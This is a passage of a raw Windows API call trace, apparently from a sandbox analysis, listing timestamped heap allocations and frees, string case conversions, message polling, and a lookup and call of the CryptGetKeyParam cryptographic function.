(HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0179.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0179.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0179.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0179.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0179.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0179.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0179.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0179.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0179.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0179.860] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0179.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0179.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0179.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0179.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0179.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0179.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0179.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0179.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0179.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0179.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0179.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0179.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0179.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0179.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0179.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0179.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0179.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0179.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0179.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0179.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0179.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0179.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0179.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0179.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0179.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0179.861] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0179.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0179.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0179.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0179.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0179.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0179.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0179.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0179.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0179.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0179.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0179.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0179.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0179.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0179.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0179.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0179.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0179.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0179.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0179.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0179.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0179.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0179.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0179.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0179.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0179.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0179.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0179.863] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0179.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0179.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0179.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0179.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0179.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0179.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0179.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0179.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0179.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0179.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0179.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0179.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0179.863] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0179.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0179.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd420 [0179.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0179.863] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0179.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0179.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0179.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0179.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0179.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0179.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0179.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0179.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0179.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0179.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0179.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0179.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0179.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0179.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0179.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0179.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0179.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0179.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0179.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0179.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0179.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0179.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0179.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0179.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0179.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0179.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0179.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0179.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0179.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0179.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0179.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0179.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0179.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0179.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0179.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0179.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0179.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0179.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0179.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0179.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0179.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0179.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0179.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0179.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0179.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0179.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0179.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0179.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0179.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0179.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0179.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0179.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0179.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0179.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0179.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0179.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0179.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0179.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0179.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0179.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0179.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0179.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0179.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0179.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0179.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0179.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0179.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0179.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0179.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0179.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0179.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0179.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0179.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0179.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0179.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0179.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0179.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0179.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0179.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0179.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0179.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0179.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0179.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0179.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0179.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0179.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0179.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0179.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0179.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0179.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0179.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0179.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0179.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0179.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0179.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0179.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0179.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0179.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0179.868] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0179.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0179.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0179.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0179.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0179.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0179.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0179.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0179.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0179.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0179.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0179.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0179.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0179.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0179.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0179.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0179.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0179.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0179.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0179.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0179.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0179.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0179.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0179.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0179.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0179.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0179.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0179.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d440, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0179.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0179.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0179.869] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0179.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0179.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0179.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0179.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0179.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0179.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0179.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0179.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0179.869] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c2718, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2718*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0179.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0179.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0179.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0179.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0179.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0179.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0179.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0179.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0179.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0179.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0179.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0179.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0179.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0179.870] HeapFree (in: 